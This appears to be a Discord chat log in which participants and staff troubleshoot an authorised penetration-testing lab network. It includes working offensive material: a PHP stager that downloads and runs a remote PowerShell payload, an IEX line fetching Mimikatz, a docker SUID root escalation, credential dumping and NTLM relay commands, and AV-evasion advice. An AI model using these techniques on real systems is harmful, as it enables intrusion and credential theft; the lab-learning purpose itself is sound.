#holo-network
But the drop down menu is empty when I go to select the listener and implant template in the launcher tab
I clicked on the start button, but as soon as I go back to the menu, it goes back to uninitialised
A reboot did the job
@topaz jewel Covenant doesn't have the best input handling, so if you leave a trailing space in a field it will often crash it. If you cut and paste info like your IP address, always check for that prior to hitting enter
plenty of people are. What's your question?
i found the creds of 'wa...' from the previous step
and then we have access to PC-FILESRV as said in the tasks ... the creds aren't working for me
they work, I've seen some users have some weird issues with the machines just being funky
try various ways and protocols
From what I've noticed it's just a matter of messing around with syntax until it works for whatever reason
I've been waiting for the reset 2 times, same issue. I just want to know if I'm missing something, like if I have the wrong creds
you probably have the right creds. Remote protocols are just funky sometimes
no WinRM, I'm trying to login from RDP
After 3 excruciating days, I've finally pwned Hololive
Anyone need help, feel free to hit me up
Thank you @lone spruce and team for the challenge, learned a lot
Gave +1 Rep to @lone spruce
can someone nudge me on task 17?
Could you be a little more verbose in where you're stuck, what you're doing, what isn't happening, etc
basically can't get around one of the security options that the mysql server is running with
you're not connecting to the MySQL server running on the docker container, right?
@lone spruce thank u for ur points, I succeeded in logging into PC-FILESRV01, it was a problem in the machine
hi, i'm not able to reach L-SRV01, it seems to be down...
anyone have same problem?
What subnet are you in?
Hi, I am in Task 47 where you have to weaponize the relay. When I try to do so I get the following error and psexec exits: [-] Error performing the uninstallation, cleaning up. Has anyone had the same error?
Ok fixed it. I have just used smbexec instead
But i am curious... did anyone stumble across this error? and what is the problem?
yeah, but no problem. now i know that impacket has more tools for rce :)
ad is whack
is there an AV installed on that machine?
there shouldn't be
Hi, I'm not able to reach L-SRV01
hmm, restart the network. I haven't heard of any issues existing with .70
when you ask for my subnet you mean the subnet i'm connected onto via the vpn right?
how do I restart the network?
but still a very nice network. had a lot of fun and learned a lot of new stuff <3
if you scroll up to the network diagram there will be a reset button
with it you can vote for a reset on your subnet
Yep thx
Gave +1 Rep to @river cradle
Actually I'm not on 70, 70 is the subnet my VPN is on, the LSRV01 subnet I'm on is 69
ah, the famous .69
in that case leave the room and re-join it to get assigned to a separate subnet as .69 is a test one that is kinda broken and there are too many people there
I think most have been moved off 69 now
well it still shows 24 reset votes required
Thanks, i was starting to lose hope with holo lol
but yeah most were assigned to other ones
I'm on 150 now but still can't connect to the server
is your network started
yes
did you download new openvpn file, since you changed networks you will need a new file
yes i did
which machine exactly are you trying to connect to and what port
10.200.150.33, port 80, vhost admin.holo.live
did you update your host file
yes

any hints for the DLL hijacking part? I've found the vulnerable app
and an article talking about the exploit
but i think the exploitation idea / DLL needed is different
I am stuck on Task 27. Can I chat with anybody who has completed this step?
what specifically are you having trouble w/
after capturing the token, I try to submit it via the url and then refresh ... but I get redirected back to index.php
any ideas?
@lone spruce
iirc when you refresh the page it invalidates the token
iirc you just need to populate the user_token field with the one found in the session cookie
yeah.. not sure what I am doing wrong
I wonder if anybody else out had the same issue...
Could you be more specific by submit then refresh?
You should just submit and that's it
And for every refresh of the password reset page you get a new token because you're essentially telling the server to reset the password each time you refresh
so the token won't be the same
I am using Burp and intercepting the request... After I hit "Reset"
I capture the user_token ...
then I simply use Burp repeater to edit the user_token to http://target/index.php?user_token=blahblahbvlah
I have also used it under the Cookie: field of the GET request
Have you tried not using any tools and just shoving it into the url
I have also tried it as follows: http://10.200.blahblha/?user_token=3r23r23r23blah
tbh the infrastructure might not like burp I don't know, I built it, it's janky
Wait? You're not using the password reset page?
just shoving it into a parameter?
that's not going to work
if I do that ... It will redirect me to a page where I can reset the password of the user... is that intended? I don't want to do something that might mess it up for others.
yo uhh, after this my reverse shell commits sudoku,
any reason why?
I'm using a VM, bridged,btw
did u use msfvenom for the reverse shell?
nahh, this is task ...12
I was able to figure it out. Thank you
Gave +1 Rep to @lone spruce
do I have to use msf?
nah..
dm if you want ... @cedar maple
well- I did use nc rev but I'll poke around with py then
Yes that's intended. That's exactly what is supposed to happen
I mean you're bypassing the password reset page
Summon @wind bobcat
damn, Korone
well it could be likely that someone in your network is doing that tho seems weird
well I think I'll try getting a reverse shell from attack box after few hours
or a network reset might help?
if u got the votes
huh, I have upgraded shells before but this one acts weird for me
the python command does not give me a "half-upgraded" shell, so I can't really use the ctrl+z trick to upgrade it further via stty raw
any ideas?
Have you tried python3?
Task 43: found the vulnerable application, stuck in DLL hijacking. I created my DLL but can't overwrite the existing DLL
if you're overwriting any kind of DLL you're doing it wrong
you're hijacking a non existent DLL
what can I do to make the application use my DLL?
A "User" on the network will run the application
it doesnt specify to overwrite anything
So I'd need to add my DLL to the application dir, then how does the application call my DLL?
I can't understand this step
you need to add the malicious dll to the directory where it should be in
in most cases the users Desktop
it also has to have the exact name
the application uses dll when it starts
the dll you are hijacking is called but does not exist
Instead it calls my DLL from desktop right?
therefore when you hijack it and create it the application will call it then execute your malicious code
it's not doing anything instead. You are just taking an operation of an application and controlling it. The application attempts to call the dll whether it exists or not
Yeah, that didn't work
I'll try python3 in the morning, and let ya know
I did try to find the dockerenv flag w/o that but no success
Task 8: can't find the domain names of the webserver with gobuster
what am i doing wrong?
You're attempting to find sub domains with a sub domain
It shows in the output
www.www.Holo.live
that's way off
try just using the IP
Ur trying to find the sub domain of a website. For ease of use of a scanner what do you think is the best url to supply it with? Especially as u can see it didn't strip off the www.
Learning to debug what a program or code is doing is vital to cyber security testing.
I am on the container machine, where I should be able to make a full tty shell. This command has been given to me python -c 'import pty; pty.spawn("/bin/bash")' but it doesn't work, I don't get a full tty shell
also /bin/bash -i or python3 doesn't work
@zenith delta try python3 -c 'import pty; pty.spawn("/bin/bash")'
Also didn't work for me from the initial shell.. I had to create an msf payload, from there I used the python 3 version
Good workaround nice
thanks figured it out
Gave +1 Rep to @limpid hollow
Finally finished, this really was an amazing network. Had to read a little from wreath but was able to bypass the av, special thanks to @whole falcon who helped me out a lot.
Gave +1 Rep to @whole falcon
hey guys, can anyone please do a reset to holo network
Which subnet are you on?
10.200.151.X
Task 12
I found the parameter that is vulnerable to RCE through the source code, but when I tried to do the same thing with wfuzz it kept giving me a 404. I don't understand what's wrong with my command so, can anyone help me
wfuzz -c -b ||"PHPSESSID=ut2b55qbm289jijn06b4lij6po"|| -u http://dev.holo.live/||dashboard.php||?FUZZ=ls -w Temp/test
The word list has only one word and I even tried this with burp intruder and it worked perfectly i.e gave me the status code 200, with variable length
because you're fuzzing the wrong subdomain
lol
Yup wrong subdomain
Task 21 Cracking all the things, I need to crack a sha512crypt hash. I use the following command hashcat -m 1800 hash2 /usr/share/wordlists/SecLists/Passwords/Leaked-Databases/rockyou-75.txt
I am not able to crack the hash
Try the full List. rockyou.txt
I waited about 30-40 until it was cracked ... Get Coffee/Tea and wait
Tis why we suggest colabcat
I ended up trying to crack the root hash for some reason when i was doing the room and i waited like 40 mins for it and realised that i was doing it wrong
RDP on PC-FILESRV down ?
is it closed on an nmap scan
if not then no
check your syntax
if its still not working move to another protocol
The nmap scan isn't working for me, all hosts on the network are down. Am I doing something wrong or is it a bug?
i had access to it yesterday
proxychains xfreerdp /u:XXXXX /p:'XXXXXXX' /v:10.200.142.35
but not anymore
I dont know, reset the network
1/3 need 2 more votes if anyone here has the same prob reset plz
the same state i had yesterday, everything looks the same and it was working smoothly
but not today
I'm almost at the point of finishing the room, one flag left
I can't access the holo network for some reason, can anyone help me?
Hey guys I am facing an issue with socks4 part and proxychains
It worked nicely during Wreath
Check if your network is started
You added the wrong IP in /etc/hosts, it should be 10.200.153.33
whats the issue
Hi everyone! I'm trying to privesc using SUID on "L-SRV01" but when I follow the instructions on gtfobins, they tell me to set the passwd for the user "www-data" but I don't have the passwd for this user. So maybe I missed something? Any hint? (task 19)
They're windows boxes they don't respond to ping
Are you sure you're using the right exploit?
There are multiple on that page
It sounds like you're attempting to use the sudo exploit
I'm using the right exploit, I already answered the question on the task so I'm pretty sure I'm using the right one, but when I try it the revshell asks me for a passwd even though I'm the www-data user, so I don't know what I missed.
I am sorry, I was stupid and my proxychains.conf had one single quote lying around which made the whole conf not work. Now it responds to my crackmapexec
If it's asking you for a password are you sure you're using the right one?
Could you send the exploit in spoilers here?
sudo install -m =xs $(which docker) .
./docker run -v /:/mnt --rm -it alpine chroot /mnt sh
You're attempting to copy and paste an exploit without any idea what it does
look at the exploit
understand what it's doing
you have an entire line that isn't needed
Ok, thanks for the help! I'll try harder
ugh I'm stupid,
what's the reason that my term won't go ahead with reset after stty raw -echo and then fg, any ideas?
Looks like you're using kali, kali's shell is now zsh. You need to follow the zsh instructions which specify a small tweak
ah, that makes sense, I'll try that
oh yeah that worked, thanks!
now, to find the damn SRV02 flag
Can anybody help me with AV evasion?
I understand AMSI now (I guess?)
But I don't understand how to compile ThreatCheck
Or use grunts
Or use Covenant
And the walkthrough is kinda rusty
Anyone who has completed Holo and is open to DMs?
It's too early to cry, I usually schedule my crying sessions into late night.
I better wait for Saupki to come online
Cry == cryillic 
L-SRV01 down?
L-SRV01 certainly appears to be dead on my network, but apparently I've joined the test network on 10.200.69.1/24 and am unable to escape to a normal network
Been a bit of a rocky experience so far, anyone got any suggestions on how to proceed?
Well it's because people nuke the initial webserver. Go for a reset. That's the only way out guess.
i usually only see 1/3, damn
check pins
Aye, leaving and re-joining wasn't working, Skidy fixed it though
If not anyone else answered, you can dm me
Where exactly are you confused. It can help use make it better if you explain more
Yes you can? Just leave the network and rejoin. That subnet is trashed
I left .69 multiple times and kept being re-joined to it today when joining back into the holo room, but my issue has been resolved now anyway
That's wacky
should've put you into a new subnet
Did you join before it was publicly launched?
I'm not entirely sure, it's possible as I've been testing the network for use at work, Skidy might have joined me to the network before release but it'd be best to confirm that with him
I had previously left .69 a day or two ago, but attempted to join Polo on his network and got dropped back into .69 and was trapped there
Well the whole grunt part is confusing, partly because Windows is not my Domain
Thanks @pulsar field I'll make it quick
Gave +1 Rep to @pulsar field
How do I compile the ThreatCheck
reported to Skidy. We must've hit the user cap again. We're reporting -2942 users in the room so something's up to say the least, lol
1. Git clone or download the Zip and unpack it. 2. Import the sln file in Visual Studio. 3. There in the Build menu, Build Solution. That builds it.
Aah thanks. I didn't know that
iirc grunts are just fancy words for listeners for c2 channels
ex. SMBGrunts are listeners that communicate over smb
I need to start working on my WIndows skills this fall
@wind bobcat any good resources to get started with windows for a beginner?
I also need some. After windows fundamentals 1,2,3
Let me know biggus if u get some. I heard some itprotv courses are good
And here is something I found but the links to windows resources are borked
https://github.com/DFIRmadness/5pillars/blob/master/5-Pillars.md
It's specified in one of the very first tasks
Yeah but my Dev environment is very very shitty. Nevermind, I'll figure out something
What do you mean shitty
you can pretty much run vs on anything
I've compiled shit on my beat up who knows how old laptop that doesn't work half the time
compiled binaries, there was a github link to it
:)
if anyone can check plz
We can't really just check if a machine is up or down
are you trying to ping it?
If so it's probably not going to work because it's a windows machine
it's also behind a pivot so make sure you're setting up your proxy
Hey everyone
Having some issue connecting to the webpage ad.....live is there an issue with the docker?
Have you added the domain to your /etc/hosts file?
@high salmon if you try leaving and rejoining you should be put in a new network
same happened with me also, I just left it for some time, it's working fine now
anyone active here?
@wind bobcat
pong
pebcak
can you help me out
okok
can someone dm me i need some help with task 18
Bleep bloop. URL-encode your ncat command, from what I can see.
what do you mean by down?
you can't ping it if that's what u mean
good day guys
i have trouble with subdomain enum. Trying to fuzz with gobuster but nothing's found. Anyone who had the same?
can you post your full command, please?
sure
gobuster vhost -u 10.200.161.33 -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 35
I can tell you i immediately see a problem with your command
what's the problem
domain name > IP address
there were no domain names for the ip address mentioned
take a peek at L-SRV01 and poke around
i tried configuring holo.live as the domain name in /etc/hosts but it did not work
how do you mean it didn't work?
the answer to T9Q1 is what needs to be in /etc/hosts, not holo.live
it found like 2 vhosts but when i tried to check them it did not work
again, how do you mean it didn't work?
like their port 80 was down
that shouldn't be the case. they're all running off of the same server
ikr, I just set up a domain name of holo.live to the ip address
Ikr but I don't know what's going on
if you try
curl http://10.200.161.33/ -H "Host: dev.holo.live"
do you get a response?
yes! funny thing is when i try to enter the web server with the domain name 'holo.live' it just doesn't show up
and how is your /etc/hosts file formatted?
it should look like so
||10.200.161.33 www.holo.live admin.holo.live dev.holo.live||
dang, why www.holo.live instead of holo.live? I think I have a gap in that area
the primary domain name holo.live is reserved for the domain controller
it's like that in all AD environments
oh, so the www one is for the webserver, gotcha?
correct
thank you so much!

hey there
anyone having a trouble getting a reverse shell at t13
solved it already
Can we retake the room after it is finished?
Yep, if you go to options > reset room
ty
Is the holo network access limited to 10 days only.. can I use it after 10 days
anyone else having issues trying to access the network?
~~is network up and running. is vpn good and connected? ~~ just to be sure
You can rejoin after access is up, the 10 days is just so it frees up space on the networks
ooo.. thanks.. you mean after 10 days it's hard reset like deleting files and logs ..
Gave +1 Rep to @glacial temple
For the docker escalation?
Question do we have a lab where i can work on for that part? like Docker rodeo?
i think yes.. search for docker you will find some
No, all of your progress stays your vpn connection just expires
It's already fixed stop ponging me
Hi, I am doing the holo network and on task 9 I have completed the vhost discovery part using the seclist wordlist which was recommended but still did not get the two domains
using gobuster
can we see the command you used?
oops i saw the old chat and i realised my mistake
well, in task 8 there is a nmap -sV -sC -p- -v 10.200.x.0/24 --min-rate 5000 command and before it is stated that 10.200.x.0/24 is in scope - how should I interpret the x?
the x is the subnet you are on.
Hello, can any one help me in the AV Evasion section, i have some questions about it
so sorry to ping again, but there is another double text on task 19
How the hell?
I know I didn't place that many errors there
@outer junco this wouldn't happen to be on your dev side would it?
@wind bobcat you do something?
@lone spruce I also want to report a bug, i don't know if its from my part. After getting the first shell from the admin page everything is great but if that shell is stopped admin.holo.live won't work until the network is reset.
i can do a video on it after the network resets if you want
after login the admin page is in an infinite loading loop
nope
That sounds like an @wind bobcat problem
known issue. clear cache or open in an incognito tab.
works! thanks
Ah forgot about that
well, I thought about it, but I have 10.50.X.Y IP not 10.200
for future users:
When getting the second shell don't forget to put the "python3 -c "import pty;pty.spawn('/bin/bash')" even if the terminal shows who you are and you don't think u need it
I spent 2 hours on the suid with the (no tty) error
dont be dumb like me
hm, also I did have Nmap scan report for 10.200.169.33 [host down] but the correct first answer is 33 for the last octet (for me it was 250 one that is up)
maybe I'm doing something wrong
the IP Addresses referenced in the diagram (see screenshot) is the scope for the network. Yours will be different. user subnet != network subnet
that one is understandable - but then, what am I doing wrong? Can I DM you to not spoil it for anyone? For me the host that is supposed to be up is not responding (first answer, task 8)
if the host isn't responding
- Try resetting the network. You can submit additional resets every hour
- Leave and rejoin the room. You'll likely get placed in a new network
hm, ok - but what about other host that I've discovered (.250)? is it a part of network? maybe in my network it is just under different IP?
Hello, I'm at task 13 where I'm fuzzing for parameters. I used wfuzz and got results, but the output is way too long. Is there a way for me to refine it? --sc is not working right for me
I used --sc 200 but none of the outputs were right or matched the answer in the answer field
Hey man I have an issue with uploading mimikatz.exe using the upload feature on covenant
I think AV is doing something something with it
Please ignore this message as I changed pass disabled av and did it that way and brought the av up after I am done
That works for now
but just a note if you're looking to write a report we're not looking for "I turned off AV", we're looking for the most unique approaches to getting around AV
I am not going for any reports
I changed the password and now the hash is not working any more
This isn't my forte so correct me if I'm wrong, but have you tried getting rid of the ls la?
yup I've tried other commands like whoami, uname, echo etc. The linux shell commands work just fine but the tool doesn't give the proper result
@lone spruce can I dm you
Can somebody verify my hashes
I have the hashes dumped using mimikatz and now stuck
As spraying does not work
Why are you spraying hashes?
I mean I can't say I've memorized the entire attack path but I don't remember password spraying?
Have you tried getting rid of it all together and just going off of fuzz?
@wind bobcat Hey I am stuck at the part of the crackmapexec pass the hash section
I have changed the password of Administrator on S-SRV01 and disabled AV, did changing the password screw it up?
that's Cry's section.
Can you please vote reset on my instance
Okay but that does not work can I dm you the hashes to verify if its correct
The hash that you get should be correct. It's loaded into memory via autologon via a password we explicitly specified.
in Mimikatz if you do a sekurlsa::logonPasswords, you should probably see the cleartext password someplace in there
and for future reference, you always want to add a user account during an engagement. Never change the password.
net user newuser Password123! /add
net localgroup Administrators /add newuser
Yeah I was like very desperate at that moment and it slipped out of my mind
And Now, I want to die as for like 3hours I was copying the SHA hash instead of NTLM
Yup that too, then it just gives me allllll these results and idk which one is the successful request, there's way too many to sort through, which is why I want to sort by the response code T__T. It's been like 5 hours since I started with this thing
@wind bobcat ree spooks this is you
you are specifying the cookie though, right?
because the reason you wouldn't be seeing different character lengths is the lack of a cookie. It's behind a login portal, remember
No cookie for you
Hi people, need a little help here
I created this payload for the file upload on S-SRV01
<?php
function get_stager() {
$init = "powershell.exe";
$payload = "Invoke-WebRequest http://IP/rs.ps1 -outfile rs.ps1"; // Insert PowerShell payload here
$execution_command = "shell_exec";
$query = $execution_command("$init $payload");
echo $query; // Execute query
}
function execute_stager() {
$init = "powershell.exe";
$payload = ".\rs.ps1"; // Insert PowerShell payload here
$execution_command = "shell_exec";
$query = $execution_command("$init $payload");
echo $query; // Execute query
}
get_stager();
execute_stager();
die();
?>
The file uploads successfully but isn't executed
Not even the request is made
Any guesses what I am doing wrong?
Have you "called"/accessed it?
I tried SERVER/db-shell.php but nothing
Not really
so no?
Nevermind, I was requesting the wrong path
But the revshell payload failed
I used Chimera
If the reverse payload failed, maybe try with AMSITrigger if it's detected by AMSI as malicious
I used level 4 obfuscation in Chimera, lemme try that again
usually just obfuscating it won't fully bypass defender
it can but you have to craft a decent payload
also as always we suggest checking that the payload works on your own host before just going and blowing it on the production server
if the payload itself doesn't work then it's not going to work in the PHP
Oh my god, i'm so dumb, Thank you so so so much for this @wind bobcat
Gave +1 Rep to @wind bobcat
Is it "legal" in the Pentest report if I disable AMSI altogether?
there are no restrictions per se to the report
we're just looking for the most unique ways of evading detection
ideally you are as quiet as possible and stealthy
so disabling AMSI would not be recommended
Hey man I can't get task 39 which asks for AV data
The event logging and av product
I ran sharpedr
But can't find a thing to fit the answer
So I am trying to get Mimikatz on the machine with
IEX (New-Object System.Net.Webclient).DownloadString("http://IP/Invoke-Mimikatz.ps1")
But not even the request is being made
Any ideas what I am doing wrong?
PS: I can download other stuff, just this particular one errors out
Okay, nvm I changed the name and it worked
Wrong channel dude
Anyone who successfully dumped LSASS creds?
Hi, on task 10. Fairly confident I have found the file that loads images for the dev domain. It's an empty file though. Guessing someone is playing silly buggers. Any admins that can restore? Or do I need to get the votes to reset?
I think it could be needed for task 12, what file from the information leak?
If not I will keep searching?
how do you mean it's an empty file?
@wind bobcat !!!! Be my savior
Cry is responsible for the middle of the network
How do I dump LSASS creds 
Oh boi I am crying
Stupid Defender

It's removing all mimikatz things
secretsdump.py is your next best bet
I guess the box doesn't have python
g.* is 0 bytes.
it's not a local tool, it's a remote tool
the specific url you're accessing, please?
don't worry about spoilers since this is a guy did not work
Ughh but doesn't secretsdump require some sorta creds?
guided* speech to text ftw
yes local admin access which you need for mimikatz as well lol
if you have local admin access, you can create a local admin
The Cycle of Life
dev.holo.live/img.php
you're missing a parameter.
that's why lol
go look at the actual images that are loading on the web page
Any ideas of how to be sneaky? :(
you really don't
just clean up after yourself
if you want to be extra
dump the lsass process and parse it manually offline
Aah sure
but that's work
i would just create a local admin, dump creds, remove the user, and be on my way.
hm?
@woven lava it helps if you're more verbose in your questions rather than "please help, defender bork". Specify what you've tried, where you're stuck, etc
I have tried:
- The Mimikatz binary (which gets removed)
- The Mimikatz Powershell script (which isn't invoked)
- I've tried various obfuscation methods but all failed (including CustomKatz)
I tried adding another user but am pretty sure the syntax is wrong somewhere when using secretsdump.py
Have you tried following the course guidance?
The same steps taken to evade with covenant can be used on any tool
Have you tried researching evasion techniques
I used Chimera because Covenant was too complex for me.
And yes, I tried researching tools and even tried a bunch of them
Seems like you really just need to reread over the tasks and do some more research
not a lot we can do for you
I just dump lsass with rundll32 + a dll I forgot (it's on hacktricks) and sam/system with reg save to an smb server on my Kali and call it a day
It's pretty late back here. I'll let you know tomorrow
You've got time, don't worry about running through it super fast
take your time and pick up on some new concepts
This is a perfect primer for Pen-300
I'd say most of what you're doing here is harder than pen-300
when was this network released
I have got a plan but I'm getting the syntax Wrong I guess
This might be stupid
But when I add a user(Assume username to be db) it is listed as:
.......
HOLOLIVE\matt
db
.......
What does HOLOLIVE signify?
And how do I add my user to the group?
Holo live specifies the domain
And a decent google question
TLDR you don't have permissions because you don't control the domain
Aah that might explain why I can't use secretsdump
Just a side question: Disabling Defender is a lot of noise, so how about excluding a particular folder? Is that stealthier somehow?
(If I delete it later)
We're looking for unique approaches not the easy way out
Hi all, I need a small hint/help about task 15. I have got the shell and now according to the task I have to submit the flag but I am unable to do so
little confused because there is nothing in home directory
ok so me again - now that the .33 server responds - so what does that x mean in 10.200.x.0/24? Yesterday I performed nmap scans using a bash for loop (nmap 10.200.0.0/24, 10.200.1.0/24, 10.200.2.0/24, etc) - but maybe I should know what x is at this time
Hey, can we vote for resetting the network? I messed up with stabilizing the shell
wait a bit, i'm running that massive scan
and I think you have that here
another question: does it mean after a few days I won't be able to complete it? or is it only counting my premium membership?
yeah, that's probably it
ok I'm fine with resetting you can do that
Can someone help me on the dll hijacking??
Its better to ask your question specifically @real talon
I can't do the dll hijacking
@hollow linden I could show you what I have found so far
This is all I found
This is all i have got
Now I made a DLL using covenant, renamed it to the not-found DLL and put that thing in the place of the binary @wind bobcat
Hello guys! I have a bit of a road block for the fuzzing part. I am using gobuster for the vhosts scan on the attack box with /etc/hosts edited to have 10.200.175.33 FQDN but all I get at the end of the scan is garbage....... I am looking for
What domains load images on the first web page? and used the following command gobuster vhost -u FQDN -w (the recommended one). Any idea as to what I am doing wrong?
did you write literally FQDN in the /etc/hosts or this is just a placeholder to hide spoilers?
and are you sure that IP address is ok? I'm just asking because you can be at a later task or I don't know something
you're still in cry's territory
Yes I am crying really hard
:L
you can try the other method from task 43, metasploit.
ok
i've been waiting for 10 minutes and i cant find anything useful on the internet
any ideas?
you can run it with dotnet run --project=/path/to/folder
i tried, and it doesnt work
i figured i had to build it first, and that doesn't work as well
do you have the sdk's installed?
yes, look at the first commands
tried that now, but it seems I'm still in an infinite loop
maybe i ll just use empire lol
What was the error
this is the source of the problem
There is no error, only an infinite loop
if i try to open 127.0.0.1:7443 in a browser it doesn't work
Why are you using 3.1.4?
Are there any good Resources to "obfuscate" DLL?
thats where task link redirected
Think of your dll no different as you would your payload
to SDK 3.1.411
encoding is going to be your best bet if you don't want to clean code. This is why we suggest cleaning covenant to begin with because it makes things like making a DLL that evades AV super easy
Yes
it does say 3.1 on the task, Cry
It says 3.1.0
look at the video
Scroll down. Do you always just look at a site and click the first flashy button you see
it's all the way at the bottom
Hi Asentinn. I did put it in the /etc/hosts and tried to ping to make sure it works, and it does. Also, it's task 9, so I am only at the first server now
Ok, may I dm ?
when its about downloads, yes lol
I would prefer we stay here, it's easier for my sanity and to help others
@wind bobcat I need to go back to bed and wake up less grumpy
Send nana pics
Wait
pity we don't have threads on this server - do you want to move to DM? in short - FQDN is an acronym for Fully Qualified Domain Name - so you should put in the /etc/hosts the actual host name (you can find it using different discovery tools)
spooky my dog has the same collar and leash
hhHhh
It's the directory the DLL is supposed to be in, not the binary
they differ
@zenith delta also, as long as I'm not mistaken, *.175.* is not a correct ip for that part - does curl 10.200.175.33 return you anything?
I suggest trying something more manual
It's a "bypass", I finished the Lab and I play a little bit. I don't want to spoil for anyone.
That range is fine
I have a question for sb here, about fuzzing - can I DM someone?
Ah okay, go ahead and DM me
ahh, ok for me it was different IP
there are a bunch of subnets
probably different subnets for different ppl
you just solved it. thx a lot.
Gave +1 Rep to @fading jungle
I want to talk a bit about fuzzing binary responses
Now, This is happening @wind bobcat
So i uploaded the php wrapper, but it doesn't show up in covenant after executing the file
if you type in socks do you have any sessions?
and you can access 10.200.151.30 without any issues?
connection reset typically means you cant
did you test your payload on your local testing machine prior to just throwing it up
just because threat check says it's clean doesn't mean it is fully
did you actually test against defender?
no, let me try that
there is one specific function that typically gets picked up but threat check doesnt see it
defender didnt find anything
How did you write your wrapper
i had to add a GIF header to my php file because the webserver errored whenever i tried uploading it without that header
waiit lemme grab it
that's probably going to be your problem
I suggest looking at other ways to bypass it
there is a section in the room depicting what to do if you're not sure
?
?
?
?
?
?
Btw, I cracked the hash of the user on S-SRV01. However Task 37 asks for a hostname and a flag, and I couldn't figure out either
Any help?
I can't seem to get on Fileserver01
that's because it's not fileserver01
Well I can get on S-SRV01 with credentials I got
But then, how do I get on FILESRV01?
What is the full path of the credentials file on the administrator domain? Can someone DM me the gobuster command for this please?
Yes.
I am all done till task 36
Now, when I spray the network with the credentials, only S-SRV01 is successfully pwned
Just use regular gobuster directory syntax but with a domain
@lone spruce can I DM you a question? It got certain spoilers otherwise I would have dropped them here.
I'll take just a minute.
what creds are you using?
that should work. Best advice I can give is to reset the network
reset network votes are not enough
you get one reset every hour
okay thanks i guess waiting is the best option
if you'd like to explore an additional exploitation path, the dev subdomain is also vulnerable to RFI
aha great
question: in task 16 we are given the second IP right away (||from the internal network, 192.168.100.1||) in the example code snippet - did I miss something ||or is the IP that we are provided, 192.168.100.1, the gateway IP from the networking knowledge?|| I can get the private ip of the current environment I'm in with ||ifconfig||, that I'm aware of
also on my server ||/dev/tcp doesn't exist, nor is anything returned from nc scan|| - does it mean something went wrong and I should reset the network?
Im having issues with task 37. I was able to get the hash which seemed to work on SMB for PC-FILESRV01 but not WINRM for PC-FILESRV01
why don't you try another protocol to get in, instead of winrm?
ah i finally got the other protocol to work, thanks!
Gave +1 Rep to @pulsar field
Has any one done the docker privesc (Task 20)? I think I know what I need to do, just not sure how to execute it or construct the syntax. I'm thinking make a dir on the host, then mount the docker to it, giving me root?
Why would this not work with the SUID bit set?
docker run -it -v /:/mnt alpine chroot /mnt
Do I need to build my own docker image first?
no, there is an image , check which image is available...
and in your docker command -check GTFOBins- is the sh missing at the end
Thanks, looking now
Gave +1 Rep to @pulsar field
The box is down. I will try later.
In task 39 we are asked the names of the monitoring and the logging software but both Seatbelt and SharpEDRChecker fail to read some drivers or something
How do I get the answers?
/dev/tcp does exist -- it exists in the form of /dev/tcp/ip/port
what are your opinions about holo network?
idk, i find it sometimes like jumping to a topic and not explaining it well, just my opinion atm
If you find something like that then just tell us and provide us feedback so we can improve it
well i didnt write it in an offensive way just my thoughts
neither did I. We just want to make the best experience possible so if you think an area needs work just let us know
well i will complete the room and then provide feedback where i can write my feedback?
@wind bobcat Im just putting this here for now. If you want to move it I dont care
ls /dev/tcp returns nothing, actually listing /dev content didn't return tcp - do you mean I can't see /dev/tcp, but can refer to /dev/tcp/ip/port? still, nc won't return anything
it shouldn't because it's a socket
it's not a file or a directory
it's a physical device
but.. but "in linux everything is a file". I thought this would be the same
it is, but it's not
ok, so I guess everything is ok, and probably nc doesn't work here and I should scan with a different technique
Hey guys, need a little help with the name of the vulnerable application found on PC-FILESRV01
I got the Scheduled Task thing
But "which one"
I couldn't find it when I listed the scheduled tasks, even after restarting the whole network a few times. I went to check the windows event log and apparently it is bugging out.
Like failing to start because it is still in progress, and there were multiple instances of the vulnerable application running
So how did you finally narrow it down?
the pictures in the tryhackme page actually says the name of the vulnerable application
the next part is figuring out where it is
im still stuck in the part of hijacking, tried running the binary locally and renamed my dll multiple times to the different missing dll names and still can't pop the covenant :/
The FILESRV01?
I am still lost on this part
oh yea , i meant finding which directory does the vulnerable application reside in
Any pointers?
if u got the name of the vulnerable application, u can do a simple windows find based on that name
oh right that
:X im kidding i kinda bumped into it manually
iirc it's in a desktop
TLDR, You need root to see the scheduled task. You can find the application by some basic file enumeration
I got the application but how do I know that it is the one?
Like I can gather it from the hints
research, testing
approach it as you would any other application you dont know what it is
You know its vulnerable because we have presented it in such a way
but approach it as you would anything else, research it see if it has any low hanging fruit, test it see if you can find any vulnerabilities, etc.
Nah I meant that how would I know that this is being run as a scheduled task if I cannot see all the scheduled task without being admin?
Okay
TLDR: the scheduled task is automation
in the real world a user would click the application
the scheduled task is emulating the "user"
However, I believe the scheduled task question comes before the DLL task which is an oversight on my part. I need to look at it on my free time and see what I can do to fix it
I used the powerview script to enumerate the Scheduled tasks but this application wasn't listed there
Also, how would you put this bit in a pentest report?
Yes, because you don't have the permission level to see it
There are various ways but TLDR found vulnerable application allowing privilege escalation via DLL Hijacking
you could then provide references, remediation, etc
Okay thanks @lone spruce
Gave +1 Rep to @lone spruce
just an fyi for anyone participating - currently no one has submitted a report
odds of winning are 1/1
Imma try my best to create a report which is good enough. I have never really written pentest reports. Does obsidian work?
Obsidian, Open Office, whatever you want as long as it looks presentable
here's a sample report from OffSec. This is a good feel of how a report should be structured and look as a final product
Thanks @wind bobcat. I'll be right at it once I compromise this last machine. A Pen-300 would be a real pain off my student debt xD
Gave +1 Rep to @wind bobcat
It's specified in the task
Here's another good reference in case anyone wants to write a report but isn't sure where to start https://github.com/juliocesarfort/public-pentesting-reports
any tips to get the SMB connection after having started the NTLMrelayX? Can't seem to be getting anything :/
where exactly are you stuck? what have you tried? What exactly are you experiencing. Try to be as detailed and as verbose as possible
On PC-FILESRV01, I've disabled and stopped both lanmanserver and lanmanworkstation and rebooted. Verified that the port was closed and the service no longer runs.
I also have a meterpreter connection to PC-FILESRV01
I did port forwarding via this session using portfwd add -R -L 0.0.0.0 -l 445 -p 445 (command from the room page)
I ran the autoroute module to add 10.200.168.0/24 to my msf's routing table and also ran the socks_proxy module on my machine port 9050, with version set to 4a. This is so that I can reach the DC using proxychains. Verified that I can reach the DC.
Configured my proxychains with only this: socks4 127.0.0.1 9050 so that I can use the socks proxy I configured.
Started my NTLMrelayX by doing: proxychains ntlmrelayx.py -t smb://10.200.168.30 -smb2support -socks
Currently waited for quite a while, still no response :/
you started running NTLMRelayX before adding the port forward, right?
err after
i've experiemented and it seems like it has to be done before
In Task 46 the syntax is given as sudo python Responder.py -I <Interface>. Won't it be http://IP/?
@lone spruce did you change that?
it wouldn't be either
task has been updated
